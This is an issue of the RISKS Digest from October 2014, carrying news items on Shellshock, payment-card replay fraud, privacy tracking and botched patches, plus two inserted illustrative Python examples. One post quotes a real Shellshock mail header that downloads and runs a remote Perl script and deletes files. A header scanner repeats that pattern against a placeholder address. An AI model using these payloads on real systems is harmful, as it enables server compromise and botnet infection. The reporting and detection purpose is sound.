The RISKS Digest
Volume 28 Issue 32

Friday, 31st October 2014

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator


Contents

Rocket Heading to International Space Station Explodes; No One Is Hurt
NYT via Monty Solomon
Dallas hospital alters account of failure to diagnose first US Ebola case
David Tarabar
Cars become uninsurable due to their weak security
Jeremy Epstein
HP accidentally signed malware, will revoke certificate
Ars
Clueless FBI sabotages its own anti-encryption campaign
Caroline Craig
FBI director says Chinese hackers are like a "drunk burglar"
Ars
Report Reveals Wider Tracking of Mail in U.S.
NYT via Monty Solomon
ComputerCOP: dubious "Internet Safety Software" given to US families
Ars via NNSquad
Adobe is Spying on Users, Collecting Data on Their eBook Libraries; Adobe Responds to Reports of Their Spying, Offers Half Truths and Misleading Statements
Nate Hoffelder via Gene Wirchenko
Adobe tracks your e-book reading habits—sends logs in plain text
Ars
Bugzilla 0-day can reveal 0-day bugs in OSS giants such as Mozilla and Red Hat
Ars
White hat claims Yahoo and WinZip hacked by "shellshock" exploiters
Ars
Severe Security Problem in Drupal 7.x
Bob Gezelter
Chip&Pin^H^H^HDip: Replay It Again Sam
Henry Baker
Apple will face $350M trial over iPod DRM
Ars
Apple updates definitions to prevent "iWorm" botnet malware on Macs
Ars
APPLE-SA-2014-09-29-1 OS X bash Update 1.0
Monty Solomon
APPLE-SA-2014-09-23-1 OS X: Flash Player plug-in blocked
Monty Solomon
"One week after patch, Flash vulnerability already exploited in large-scale attacks"
Lucian Constantin
2 Drug Chains Disable Apple Pay, as a Rival Makes Plans
NYT
Apple Pay Runs Afoul of MCX, a Group With a Rival Product
Monty Solomon
Hackers swipe e-mail addresses from Apple Pay-competitor CurrentC
Ars
How Apple Pay and Google Wallet actually work
Ars Technica
Reddit-powered botnet infected thousands of Macs worldwide
Sean Gallagher
Apple patches "Shellshock" Bash bug in OS X 10.9, 10.8, and 10.7
Andrew Cunningham
Shellshock fixes beget another round of patches as attacks mount
Andrew Cunningham
Executing the Messenger
Henry Baker
Even a built-in keylogger!—"Microsoft's Windows 10 has permission to spy on you!"
Techworm
More on Windows 10 /preview/ data collection
Lauren Weinstein
"Four more botched Microsoft patches"
Woody Leonhard
"Microsoft yanks botched patch KB 2949927, re-issues KB 2952664"
Woody Leonhard
"Microsoft warns users to kill botched KB 2949927 patch"
Woody Leonhard
"Microsoft misses Windows bug, hackers slip past patch"
Gregg Keizer
Windows Update intentionally destroys chips
Brian Benchoff via Henry Baker
Re: Windows 9 Reportedly Skipped as Name Would Have Created Code Bugs
Mark Thorson
"12 surprising ways personal technology betrays your privacy"
Andy Patrizio
"Critical Bugzilla vulnerability could give hackers access to undisclosed software flaws"
Lucian Constantin
Adobe's e-book reader sends your reading logs back to Adobe— in plain text
Sean Gallagher
DHS No Longer Needs Permission Slips to Monitor Other Agencies' Networks
Henry Baker
The NSA has no interest in protecting you & me
Henry Baker
Law Lets I.R.S. Seize Accounts on Suspicion, No Crime Required
Monty Solomon
How Facebook Is Changing the Way Its Users Consume Journalism
Monty Solomon
Re: where last passenger went
Dimitri Maziuk
Re: Should Airplanes Be Flying Themselves?
John Levine
Taylor Swift Tops Canadian iTunes Chart With 8 Seconds of White Noise
Lorena O'Neil via Henry Baker
Info on RISKS (comp.risks)

Rocket Heading to International Space Station Explodes; No One Is Hurt

Monty Solomon <monty@roscom.com>
Tue, 28 Oct 2014 21:19:24 -0400
The unmanned cargo rocket exploded seconds after liftoff from a NASA site in
eastern Virginia.
http://www.nytimes.com/2014/10/29/us/rocket-heading-to-international-space-station-explodes-no-one-is-hurt.html


Dallas hospital alters account of failure to diagnose first US Ebola case

David Tarabar <dtarabar@acm.org>
Sat, 25 Oct 2014 19:12:23 -0400
The first three articles in RISKS-28.30 describe a Dallas hospital blaming
EHR software for not diagnosing the first US case of Ebola.  However on a
Friday evening, the hospital told another story. (Bad news released on
Friday evening is a popular PR tactic.)

  But on Friday evening, the hospital effectively retracted that portion of
  its statement, saying that "there was no flaw" in its electronic health
  records system. The hospital said "the patient's travel history was
  documented and available to the full care team in the electronic health
  record (E.H.R.), including within the physician's workflow."

http://www.nytimes.com/2014/10/04/us/containing-ebola-cdc-troops-west-africa.html

An ER patient history is not meaningless paperwork. It may be diagnostically
significant and an ER doc is responsible for examining it.  All patients are
asked about any foreign travel. While EHR software can be improved, human
and/or institutional error should be assigned the major blame for this
failure to diagnose Ebola.


Cars become uninsurable due to their weak security

Jeremy Epstein <jeremy.j.epstein@gmail.com>
Tue, 28 Oct 2014 10:53:19 -0400
According to a BBC report, insurance companies are refusing to insure
certain models of cars, or are requiring additional safeguards.  The reason?
The electronic keys can be hacked, and the number of thefts has been
increasing dramatically.

This is probably the most direct consumer connection between (computer)
security and insurance that I've seen.  Could you imagine "your homeowners
insurance bill is going up because you run Windows"?

http://www.bbc.com/news/technology-29786320


HP accidentally signed malware, will revoke certificate (Ars)

Lauren Weinstein <lauren@vortex.com>
Fri, 10 Oct 2014 09:39:26 -0700
Ars Technica via NNSquad
http://arstechnica.com/security/2014/10/hp-accidentally-signed-malware-will-revoke-certificate/

  Regardless of the cause, the revocation of the affected certificate will
  require HP to re-issue a large number of software packages with a new
  digital signature. While the certificate drop may not affect systems with
  the software already installed, users will be alerted to a bad certificate
  if they attempt to re-install software from original media. The full
  impact of the certificate revocation won't be known until after Verisign
  revokes the certificate on October 21, Wahlin said.

Oops.


"Clueless FBI sabotages its own anti-encryption campaign" (Caroline Craig)

Gene Wirchenko <genew@telus.net>
Fri, 24 Oct 2014 21:49:14 -0700
Caroline Craig, InfoWorld | Oct 24, 2014
http://www.infoworld.com/article/2838181/security/clueless-fbi-sabotages-its-anti-encryption-campaign.html

FBI Director Comey says smartphone encryption puts law enforcement in
peril.  Too bad he doesn't seem to understand technology


FBI director says Chinese hackers are like a "drunk burglar"

Monty Solomon <monty@roscom.com>
Tue, 7 Oct 2014 10:31:54 -0400
http://arstechnica.com/tech-policy/2014/10/fbi-director-says-chinese-hackers-are-like-a-drunk-burglar/


Report Reveals Wider Tracking of Mail in U.S.

Monty Solomon <monty@roscom.com>
Tue, 28 Oct 2014 06:19:25 -0400
The Postal Service approved nearly 50,000 requests last year from law
enforcement agencies to secretly track the mail of ordinary Americans for
use in criminal and national security investigations.

http://www.nytimes.com/2014/10/28/us/us-secretly-monitoring-mail-of-thousands.html


ComputerCOP: dubious "Internet Safety Software" given to US families

Lauren Weinstein <lauren@vortex.com>
Wed, 1 Oct 2014 08:32:48 -0700
Ars via NNSquad
http://arstechnica.com/tech-policy/2014/10/computercop-the-dubious-internet-safety-software-given-to-families-nationwide/

  Police chiefs, sheriffs, and district attorneys have handed out hundreds
  of thousands of copies of the disc to parents for free at schools,
  libraries, and community events, usually as a part of an "Internet Safety"
  outreach initiative. (You can see the long list of ComputerCOP outlets
  here.) The packaging typically features the agency's official seal and the
  chief's portrait, with a signed message warning of the "dark and dangerous
  off-ramps" of the Internet.  As official as it looks, ComputerCOP is
  actually just spyware, generally bought in bulk from a New York company
  that appears to do nothing but market this software to local government
  agencies using shady information.  The way ComputerCOP works is neither
  safe nor secure. It isn't particularly effective either, except for
  generating positive PR for the law enforcement agencies distributing
  it. As security software goes, we observed a product with a
  keystroke-capturing function, also called a "keylogger," that could place
  a family's personal information at extreme risk by transmitting those
  keystroke logs over the Internet to third-party servers without
  encryption. That means many versions of ComputerCOP leave children (and
  their parents, guests, friends, and anyone using the affected computer)
  exposed to the same predators, identity thieves, and bullies that police
  claim the software protects against.  Furthermore, by providing a free
  keylogging program--software that operates without even the most basic
  security safeguards--law enforcement agencies are passing around what
  amounts to a spying tool that could easily be abused by people who want to
  snoop on spouses, roommates, or co-workers.


"Adobe is Spying on Users, Collecting Data on Their eBook Libraries"; "Adobe Responds to Reports of Their Spying, Offers Half Truths and Misleading Statements"

Gene Wirchenko <genew@telus.net>
Thu, 09 Oct 2014 21:08:48 -0700
Nate Hoffelder, 6 Oct 2014
http://the-digital-reader.com/2014/10/06/adobe-spying-users-collecting-data-ebook-libraries/#.VDQhI_ldWYA

Nate Hoffelder, 7 Oct 2014
http://the-digital-reader.com/2014/10/07/adobe-responds-reports-spying-half-truths-misleading-statements/#.VDRpCvldWIV


Adobe tracks your e-book reading habits—sends logs in plain text

Lauren Weinstein <lauren@vortex.com>
Tue, 7 Oct 2014 09:22:03 -0700
Ars Technica via NNSquad
http://arstechnica.com/security/2014/10/adobes-e-book-reader-sends-your-reading-logs-back-to-adobe-in-plain-text/

  "Adobe's Digital Editions e-book and PDF reader—an application used by
  thousands of libraries to give patrons access to electronic lending
  libraries--actively logs and reports every document readers add to their
  local "library" along with what users do with those files. Even worse, the
  logs are transmitted over the Internet in the clear, allowing anyone who
  can monitor network traffic (such as the National Security Agency,
  Internet service providers and cable companies, or others sharing a public
  Wi-Fi network) to follow along over readers' shoulders.  Ars has
  independently verified the logging of e-reader activity with the use of a
  packet capture tool. The exposure of data was first discovered by Nate
  Hoffelder of The Digital Reader, who reported the issue to Adobe but
  received no reply. Ars has also reached out to Adobe for comment with no
  response."


Bugzilla 0-day can reveal 0-day bugs in OSS giants such as Mozilla and Red Hat

Monty Solomon <monty@roscom.com>
Tue, 7 Oct 2014 10:29:27 -0400
http://arstechnica.com/security/2014/10/check-point-hacks-bugzilla-tracking-system-to-demonstrate-bad-bug/


White hat claims Yahoo and WinZip hacked by "shellshock" exploiters

Monty Solomon <monty@roscom.com>
Tue, 7 Oct 2014 10:26:11 -0400
http://arstechnica.com/security/2014/10/white-hat-claims-yahoo-and-winzip-hacked-by-shellshock-exploiters/


Severe Security Problem in Drupal 7.x

"Bob Gezelter" <gezelter@rlgsc.com>
Fri, 31 Oct 2014 12:33:38 -0700
There has been a critical security flaw identified in Drupal 7.x, an update
is available. The flaw allows a SQL injection attack to compromise servers
running Drupal.  Details of the attack have been published. The relevant bug
entry appears to be:
  https://www.drupal.org/node/2146839

Bob Gezelter, http://www.rlgsc.com


Chip&Pin^H^H^HDip: Replay It Again Sam

Henry Baker <hbaker1@pipeline.com>
Tue, 28 Oct 2014 13:58:13 -0700
FYI—Didn't Ross Anderson's group at Cambridge demonstrate similar
problems with chips&pins a while ago?
  [YES: See http://www.csl.sri.com/neumann/cacm233.pdf]

Krebs on Security, 27 Oct 2014
http://krebsonsecurity.com/2014/10/replay-attacks-spoof-chip-card-charges/

Replay Attacks Spoof Chip Card Charges

An odd new pattern of credit card fraud emanating from Brazil and targeting
U.S. financial institutions could spell costly trouble for banks that are
just beginning to issue customers more secure chip-based credit and debit
cards.

Over the past week, at least three U.S. financial institutions reported
receiving tens of thousands of dollars in fraudulent credit and debit card
transactions coming from Brazil and hitting card accounts stolen in recent
retail heists, principally cards compromised as part of the breach at Home
Depot.

The most puzzling aspect of these unauthorized charges?  They were all
submitted through Visa and MasterCard's networks as chip-enabled
transactions, even though the banks that issued the cards in question
haven't even yet begun sending customers chip-enabled cards.

The most frustrating aspect of these unauthorized charges?  They're far
harder for the bank to dispute.  Banks usually end up eating the cost of
fraud from unauthorized transactions when scammers counterfeit and use
stolen credit cards.  Even so, a bank may be able to recover some of that
loss through dispute mechanisms set up by Visa and MasterCard, as long as
the bank can show that the fraud was the result of a breach at a specific
merchant (in this case Home Depot).

However, banks are responsible for all of the fraud costs that occur from
any fraudulent use of their customers' chip-enabled credit/debit cards
-- even fraudulent charges disguised as these pseudo-chip transactions. [...]
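As an added illustration, not part of the Krebs article or of this posting, the Python below models what an issuer's online authorization would have to check to refuse these pseudo-chip transactions. The first check is the one the article implies: a chip-flagged authorization for a card the bank has never issued with a chip cannot be genuine, whatever the network says. The cryptogram and counter checks go beyond the excerpt and rest on standard EMV practice (the issuer recomputes and verifies the card's Application Request Cryptogram, and the Application Transaction Counter must increase, so a replayed message is caught even when its cryptogram is valid). Assumptions: the cryptogram is an HMAC-SHA256 stand-in for EMV's DES-based MAC under a derived session key, the entry-mode codes "05" (chip) and "90" (magstripe) are taken from ISO 8583 field 22 as commonly used, and the card numbers, key and transaction fields are constructed.

```python
"""Issuer-side authorization model for chip ('EMV') transactions.

Added example for RISKS, not code from Krebs on Security or any bank.
Simplifications (assumptions): the cryptogram is an HMAC-SHA256 truncated to
8 bytes instead of EMV's DES-based MAC under a derived session key, and the
point-of-sale entry mode codes are taken as "05" = chip and "90" = magstripe.
"""
import hmac
import hashlib
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

CHIP_ENTRY_MODE = "05"


@dataclass
class CardRecord:
    pan: str
    chip_issued: bool                  # has the bank ever sent this customer a chip card?
    chip_key: Optional[bytes] = None   # per-card cryptogram key, only if chip_issued
    last_atc: int = -1                 # highest Application Transaction Counter seen


@dataclass
class AuthRequest:
    pan: str
    amount_cents: int
    currency: str
    pos_entry_mode: str
    atc: Optional[int] = None                     # chip data: transaction counter
    unpredictable_number: Optional[bytes] = None  # chip data: terminal nonce
    cryptogram: Optional[bytes] = None            # chip data: ARQC


def compute_cryptogram(key: bytes, pan: str, amount_cents: int, currency: str,
                       atc: int, unpredictable_number: bytes) -> bytes:
    """What the card computes (and the issuer recomputes) over the transaction data."""
    msg = f"{pan}|{amount_cents}|{currency}|{atc}|".encode() + unpredictable_number
    return hmac.new(key, msg, hashlib.sha256).digest()[:8]


class Issuer:
    def __init__(self, cards: List[CardRecord]) -> None:
        self.cards: Dict[str, CardRecord] = {c.pan: c for c in cards}

    def authorize(self, req: AuthRequest) -> Tuple[bool, str]:
        card = self.cards.get(req.pan)
        if card is None:
            return False, "unknown PAN"
        if req.pos_entry_mode != CHIP_ENTRY_MODE:
            return True, "magstripe: normal fraud rules apply"   # outside this example
        # 1. The check the Krebs article implies: a 'chip' transaction on a card that
        #    was never issued with a chip cannot be genuine, whatever the network says.
        if not card.chip_issued:
            return False, "chip-flagged auth for non-chip card"
        if req.cryptogram is None or req.atc is None or req.unpredictable_number is None:
            return False, "chip data missing"
        # 2. Recompute the cryptogram; a forged ARQC fails here.
        expected = compute_cryptogram(card.chip_key, req.pan, req.amount_cents,
                                      req.currency, req.atc, req.unpredictable_number)
        if not hmac.compare_digest(expected, req.cryptogram):
            return False, "cryptogram mismatch"
        # 3. The counter must move forward; a replayed ARQC carries an old ATC.
        if req.atc <= card.last_atc:
            return False, "ATC not increasing (replay)"
        card.last_atc = req.atc
        return True, "approved"


def demo() -> Dict[str, str]:
    """Four constructed authorizations; returns the issuer's reason string for each."""
    key = bytes(range(16))   # constructed per-card key, not a real EMV key
    issuer = Issuer([
        CardRecord(pan="4111111111111111", chip_issued=False),
        CardRecord(pan="5555555555554444", chip_issued=True, chip_key=key),
    ])
    un = b"\xde\xad\xbe\xef"   # terminal nonce (constructed)
    results: Dict[str, str] = {}
    # (a) A magstripe-only card submitted as a chip transaction: what the article describes.
    results["pseudo_chip"] = issuer.authorize(AuthRequest(
        "4111111111111111", 5000, "USD", CHIP_ENTRY_MODE, 7, un, b"\x00" * 8))[1]
    # (b) A genuine chip transaction with a cryptogram the card actually computed.
    genuine = AuthRequest("5555555555554444", 2599, "USD", CHIP_ENTRY_MODE, 12, un,
                          compute_cryptogram(key, "5555555555554444", 2599, "USD", 12, un))
    results["genuine"] = issuer.authorize(genuine)[1]
    # (c) The same captured message submitted again: valid cryptogram, stale ATC.
    results["replay"] = issuer.authorize(genuine)[1]
    # (d) A forged request with a fresh ATC but a cryptogram the attacker cannot compute.
    results["forged"] = issuer.authorize(AuthRequest(
        "5555555555554444", 2599, "USD", CHIP_ENTRY_MODE, 13, un, b"\x00" * 8))[1]
    return results


if __name__ == "__main__":
    for case, reason in demo().items():
        print(f"{case:12s} -> {reason}")
```

Run as a script it prints the four outcomes: the pseudo-chip charge is refused on the first check alone, the genuine transaction is approved, its replay is refused on the counter, and the forgery on the cryptogram. The point for the banks in the article is that check 1 needs no chip infrastructure at all, only knowledge of which of their own cards carry a chip.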


Apple will face $350M trial over iPod DRM

Monty Solomon <monty@roscom.com>
Fri, 3 Oct 2014 16:44:29 -0400
http://arstechnica.com/tech-policy/2014/10/apple-will-face-350m-trial-over-ipod-drm/


Apple updates definitions to prevent "iWorm" botnet malware on Macs

Monty Solomon <monty@roscom.com>
Tue, 7 Oct 2014 10:30:53 -0400
http://arstechnica.com/apple/2014/10/apple-updates-definitions-to-prevent-iworm-botnet-malware-on-macs/


APPLE-SA-2014-09-29-1 OS X bash Update 1.0

Monty Solomon <monty@roscom.com>
Fri, 3 Oct 2014 14:30:31 -0400
OS X bash Update 1.0 is now available and addresses the following:

Bash
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5,
OS X Mavericks v10.9.5
Impact: In certain configurations, a remote attacker may be able to execute
arbitrary shell commands
Description: An issue existed in Bash's parsing of environment
variables. This issue was addressed through improved environment variable
parsing by better detecting the end of the function statement.
This update also incorporated the suggested CVE-2014-7169 change, which
resets the parser state.
In addition, this update added a new namespace for exported functions by
creating a function decorator to prevent unintended header passthrough to
Bash. The names of all environment variables that introduce function
definitions are required to have a prefix "__BASH_FUNC<" and suffix ">()" to
prevent unintended function passing via HTTP headers.

CVE-2014-6271 : Stephane Chazelas
CVE-2014-7169 : Tavis Ormandy

OS X bash Update 1.0 may be obtained from the following webpages:
http://support.apple.com/kb/DL1767 - OS X Lion
http://support.apple.com/kb/DL1768 - OS X Mountain Lion
http://support.apple.com/kb/DL1769 - OS X Mavericks

To check that bash has been updated:

* Open Terminal
* Execute this command:
bash --version
* The version after applying this update will be:
OS X Mavericks:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin13)
OS X Mountain Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin12)
OS X Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin11)

Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/


APPLE-SA-2014-09-23-1 OS X: Flash Player plug-in blocked

Monty Solomon <monty@roscom.com>
Fri, 3 Oct 2014 14:29:09 -0400
Due to security issues in older versions, Apple has updated the web plug-in
blocking mechanism to disable all versions prior to Flash Player 15.0.0.152
and 13.0.0.244.

Information on blocked web plug-ins will be posted to:
http://support.apple.com/kb/HT5655

This message is signed with Apple's Product Security PGP key, and details
are available at: https://www.apple.com/support/security/pgp/


"One week after patch, Flash vulnerability already exploited in large-scale attacks" (Lucian Constantin)

Gene Wirchenko <genew@telus.net>
Tue, 21 Oct 2014 17:51:20 -0700
Lucian Constantin, InfoWorld, 21 Oct 2014
The Fiesta exploit kit bundles an exploit for the CVE-2014-0569
vulnerability in Flash Player, researchers found
http://www.infoworld.com/article/2836438/security/one-week-after-patch-flash-vulnerability-already-exploited-in-largescale-attacks.html


2 Drug Chains Disable Apple Pay, as a Rival Makes Plans

Monty Solomon <monty@roscom.com>
Sun, 26 Oct 2014 23:32:57 -0400
A consortium of merchants plans to introduce a payment system next year that
will supplant the use of credit and debit cards.

http://www.nytimes.com/2014/10/27/technology/personaltech/2-drug-chains-disable-apple-pay-as-a-rival-makes-plans-.html


Apple Pay Runs Afoul of MCX, a Group With a Rival Product

Monty Solomon <monty@roscom.com>
Wed, 29 Oct 2014 07:08:12 -0400
Rite Aid and CVS are not accepting Apple Pay because they belong to a
consortium of retailers planning to release their own mobile payment system
next year.

http://www.nytimes.com/2014/10/29/technology/apple-pay-runs-afoul-of-a-rival.html


Hackers swipe e-mail addresses from Apple Pay-competitor CurrentC

Monty Solomon <monty@roscom.com>
Wed, 29 Oct 2014 22:46:18 -0400
http://arstechnica.com/business/2014/10/cvs-rite-aid-supported-alternative-to-apple-pay-already-hacked/


How Apple Pay and Google Wallet actually work

Monty Solomon <monty@roscom.com>
Wed, 29 Oct 2014 22:47:29 -0400
http://arstechnica.com/gadgets/2014/10/how-mobile-payments-really-work/


Reddit-powered botnet infected thousands of Macs worldwide (Sean Gallagher)

Monty Solomon <monty@roscom.com>
Sun, 5 Oct 2014 00:08:37 -0400
Sean Gallagher, Ars Technica, 3 Oct 2014
Mac.BackDoor.iWorm used Minecraft server subreddit for command and control.

The Russian antivirus vendor Dr. Web has reported the spread of a new botnet
that exclusively targets Apple computers running Mac OS X.  According to a
survey of traffic conducted by researchers at Dr. Web, over 17,000 Macs
worldwide are part of the Mac.BackDoor.iWorm botnet, and almost a quarter of
them are in the US. One of the most curious aspects of the botnet is that it
uses a search of Reddit posts to a Minecraft server list subreddit to
retrieve IP addresses for its command and control (CnC) network. That
subreddit now appears to have been expunged of CnC data, and the account
that posted the data appears to be shut down. ...

http://arstechnica.com/security/2014/10/reddit-powered-botnet-infected-thousands-of-macs-worldwide/


Apple patches "Shellshock" Bash bug in OS X 10.9, 10.8, and 10.7 (Andrew Cunningham)

Monty Solomon <monty@roscom.com>
Fri, 3 Oct 2014 00:23:44 -0400
Andrew Cunningham, Ars Technica, 29 Sep 2014
Fixes Bash bug discovered last week that's already been seen in the wild.
http://arstechnica.com/apple/2014/09/apple-patches-shellshock-bash-bug-in-os-x-10-9-10-8-and-10-7/
  [See also http://support.apple.com/kb/HT6495—PGN]


Shellshock fixes beget another round of patches as attacks mount (Sean Gallagher)

Monty Solomon <monty@roscom.com>
Fri, 3 Oct 2014 00:22:24 -0400
Sean Gallagher, Ars Technica, 30 Sep 2014
SANS' Internet Storm Center moves up threat level based on bash exploits in
  wild.

Over the past few days, Apple, Red Hat, and others have pushed out patches
to vulnerabilities in the GNU Bourne Again Shell (bash). The vulnerabilities
previously allowed attackers to execute commands remotely on systems that
use the command parser under some conditions, including Web servers that use
certain configurations of Apache. However, some of the patches made changes
that broke from the functionality of the GNU bash code, so now debate
continues about how to "un-fork" the patches and better secure bash.

At the same time, the urgency of applying those patches has mounted as more
attacks that exploit the weaknesses in bash's security (dubbed "Shellshock")
have appeared. In addition to the threat first spotted the day after the
vulnerability was made public, a number of new attacks have emerged. While
some appear to simply be vulnerability scans, there are also new exploit
attempts that carry malware or attempt to give the attacker direct remote
control of the targeted system. ...

http://arstechnica.com/security/2014/09/shellshock-fixes-beget-another-round-of-patches-as-attacks-mount/


Executing the Messenger

Henry Baker <hbaker1@pipeline.com>
Tue, 28 Oct 2014 14:16:05 -0700
[attachment (Henry says, "but sometimes a picture is worth 1000 words.")
deleted for RISKS.  Sorry.  PGN]

Here's the To: line:
To: {:;, }, /bin/sh.-c.'/bin/sh.-c.'cd/tmp, curl.-sO.178.254.31.165/ext.txt,
    lwp-download.http:;, //178.254.31.165/ex.txt, wget.178.254.31.165/ex.txt,
    fetch.178.254.31.165/ex.txt, perl.ex.txt,
    <rm.-fr.ex.*'.&'.&@mailserver.internaldomain>

Cc, From, Subject, References, Message-ID, Comments, Keywords, Resent-From
are all similar.

Nothing quite like bashing the postman with shellshock...

Michael Mimoso, Threatpost, 27 Oct 2014
Shellshock Exploits Targeting SMTP Servers at Webhosts
https://threatpost.com/shellshock-exploits-targeting-smtp-servers-at-webhosts/109034

The persistence of the Shellshock vulnerability remains high more than a
month after it first surfaced.  The latest attacks involved SMTP servers
belonging to web hosts, said a report published by the SANS Internet Storm
Center.

Attackers are using Shellshock exploits targeting the now infamous
vulnerability in Bash (Bourne Again Shell) in order to drop a perl script
onto compromised computers.  The script adds the hacked computers to a
botnet that receives its commands over IRC, said a post on the Binary
Defense Systems website: "The attack leverages Shellshock as a main attack
vector through the subject, body, to, from fields.  Once compromised, a perl
botnet is activated and beaconing on IRC for further instructions."
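The following Python is an added illustration, not code from Apple, SANS ISC, Binary Defense, Threatpost or the RISKS posters, and it serves two items in this issue: the Apple advisory above (APPLE-SA-2014-09-29-1), which describes the new __BASH_FUNC<name>() namespace for exported functions, and the SMTP attack in this item. It models how pre-fix bash decided which exported variables were function definitions (any value beginning with "() {", with whatever followed the body then parsed and run, CVE-2014-6271), how the namespaced scheme shrinks that set to variable names no mail or web header can produce, and it scans message headers for Shellshock-shaped payloads of the kind shown in the To: line above. Assumptions: the header-to-environment mapping is the CGI one (HTTP_<NAME>, RFC 3875), with a mail filter exporting To:/Subject:/From: as the SMTP analogue; the sample headers and the 198.51.100.7 address are constructed; and the regex ends a function body at the first closing brace, which is enough for the probes seen in the wild but not a faithful model of bash's parser.

```python
"""Shellshock: which environment strings become code, and a header scanner.

Added example, not code from Apple, SANS ISC, Threatpost or the RISKS posters.
"""
import re
from typing import Dict, List, Tuple

# Pre-fix bash imported ANY exported variable whose value started with "() {" as a
# function definition and (CVE-2014-6271) went on parsing and executing whatever
# followed the function body.  Heuristic: the body ends at the first "}".
LEGACY_FUNC_RE = re.compile(r"^\(\)\s*\{.*?\}\s*;?\s*(?P<trailing>.*)$", re.DOTALL)

# OS X bash Update 1.0 (advisory above) only imports variables whose names carry the
# prefix "__BASH_FUNC<" and suffix ">()".  Upstream GNU bash uses BASH_FUNC_name%%.
APPLE_FUNC_NAME_RE = re.compile(r"^__BASH_FUNC<(?P<name>[^>]+)>\(\)$")

# Constructed sample, modeled on the SMTP attack headers quoted above; the address
# 198.51.100.7 is from a documentation range, not the real attack host.
SAMPLE_HEADERS: Dict[str, str] = {
    "To": "() { :; }; /bin/sh -c 'cd /tmp; curl -sO 198.51.100.7/ex.txt; perl ex.txt'",
    "From": "sender@example.net",
    "Subject": "() { :; }; /usr/bin/wget 198.51.100.7/ex.txt -O /tmp/ex.txt",
    "User-Agent": "Mozilla/5.0",
}

# A URL-ish token (IP/path) ending before whitespace, quotes or a command separator.
URL_RE = re.compile(r"(?:https?://)?\b\d{1,3}(?:\.\d{1,3}){3}/[^\s;'\"]+")


def legacy_function_vars(env: Dict[str, str]) -> Dict[str, str]:
    """{variable: text after the function body} for every variable old bash parsed as code."""
    out: Dict[str, str] = {}
    for name, value in env.items():
        m = LEGACY_FUNC_RE.match(value)
        if m:
            out[name] = m.group("trailing").strip()
    return out


def namespaced_function_vars(env: Dict[str, str]) -> Dict[str, str]:
    """Variables Apple-patched bash would import as functions: namespaced names only."""
    return {name: value for name, value in env.items() if APPLE_FUNC_NAME_RE.match(name)}


def cgi_env_from_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Put headers into the environment the way CGI (RFC 3875) does: HTTP_<NAME>.

    A mail filter exporting To:/Subject:/From: to a bash-backed script is the SMTP
    analogue (assumption about the attacked hosts, based on the SANS report)."""
    return {"HTTP_" + name.upper().replace("-", "_"): value for name, value in headers.items()}


def scan_headers(headers: Dict[str, str]) -> List[Tuple[str, str, List[str]]]:
    """Detection: (header, command, download URLs) for every Shellshock-shaped header value."""
    findings: List[Tuple[str, str, List[str]]] = []
    for name, value in headers.items():
        m = LEGACY_FUNC_RE.match(value.strip())
        if m and m.group("trailing").strip():
            command = m.group("trailing").strip()
            findings.append((name, command, URL_RE.findall(command)))
    return findings


if __name__ == "__main__":
    env = cgi_env_from_headers(SAMPLE_HEADERS)
    print("old bash would execute:", legacy_function_vars(env))
    print("patched bash imports:  ", namespaced_function_vars(env))
    for header, command, urls in scan_headers(SAMPLE_HEADERS):
        print(f"{header}: {command!r} -> fetches {urls}")
```

On the sample, the To: and Subject: headers are flagged with their trailing commands and the download URL extracted; under the legacy rule both HTTP_TO and HTTP_SUBJECT would have been parsed as functions, while under the namespaced rule nothing from the headers qualifies, which is why the namespace change closes the header-to-shell path even if the parser still has bugs.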


Even a built-in keylogger!—"Microsoft's Windows 10 has permission to spy on you!"

Lauren Weinstein <lauren@vortex.com>
Tue, 7 Oct 2014 08:21:54 -0700
Techworm via NNSquad
http://www.techworm.net/2014/10/microsofts-windows-10-permission-watch-every-move.html

  "Microsoft collects information about you, your devices, applications and
  networks, and your use of those devices, applications and
  networks. Examples of data we collect include your name, email address,
  preferences and interests; browsing, search and file history; phone call
  and SMS data; device configuration and sensor data; and application
  usage."

  "If you open a file, we may collect information about the file, the
  application used to open the file, and how long it takes any use [of] it
  for purposes such as improving performance, or [if you] enter text, we may
  collect typed characters and use them for purposes such as improving
  autocomplete and spell check features."

Worth reading, even though the entire article is in a low-contrast font and
italics.

  [See also Chris Merriman, *The Inquirer*, 3 Oct 2014
  Its 'privacy' policy includes permission to use a keylogger
http://www.theinquirer.net/inquirer/news/2373838/microsofts-windows-10-preview-has-permission-to-watch-your-every-move
  ]


More on Windows 10 /preview/ data collection

Lauren Weinstein <lauren@vortex.com>
Tue, 7 Oct 2014 09:03:11 -0700
I want to add a few of my own thoughts to that article on the Windows 10
preview version data collection policies.

If any of those data collection features were enabled by default, and unless
there's a big red warning at installation that you must respond to with more
than a single click, explaining all these aspects, it's still
unacceptable. Too many people will download this and use it like any other
system without considering the implications. I couldn't care less what they
plan to do when it goes out of beta at this juncture—I'm concerned about
right now.

As I recall they've done similar in previous previews, but the stakes are
much higher now given government attitudes to collected data.

It is a mistake to assume that everyone who will download this preview or
end up with it installed (perhaps by their "IT Guy") will be cognizant of
the options and implications. I'm the guy who found MS' undisclosed "phone
home" behavior years ago. It was not an enormous privacy problem, but it was
still telling and a lot of bad press for MS resulted.


"Four more botched Microsoft patches" (Woody Leonhard)

Gene Wirchenko <genew@telus.net>
Fri, 17 Oct 2014 14:29:16 -0700
Woody Leonhard, InfoWorld, 16 Oct 2014
Windows users are reporting significant problems with four more
October Black Tuesday patches: KB 3000061, KB 2984972, KB 2949927, KB 2995388
http://www.infoworld.com/article/2834535/security/four-more-botched-black-tuesday-patches-kb-3000061-kb-2984972-kb-2949927-and-kb-2995388.html


"Microsoft yanks botched patch KB 2949927, re-issues KB 2952664" (Woody Leonhard)

Gene Wirchenko <genew@telus.net>
Mon, 20 Oct 2014 11:32:26 -0700
Ah, the risks of missing documentation.

Woody Leonhard, InfoWorld | 17 Oct 2014
Windows 7 upgrade compatibility patch gets a tweaked installer, while
the SHA-2 hashing patch is summarily removed without explanation
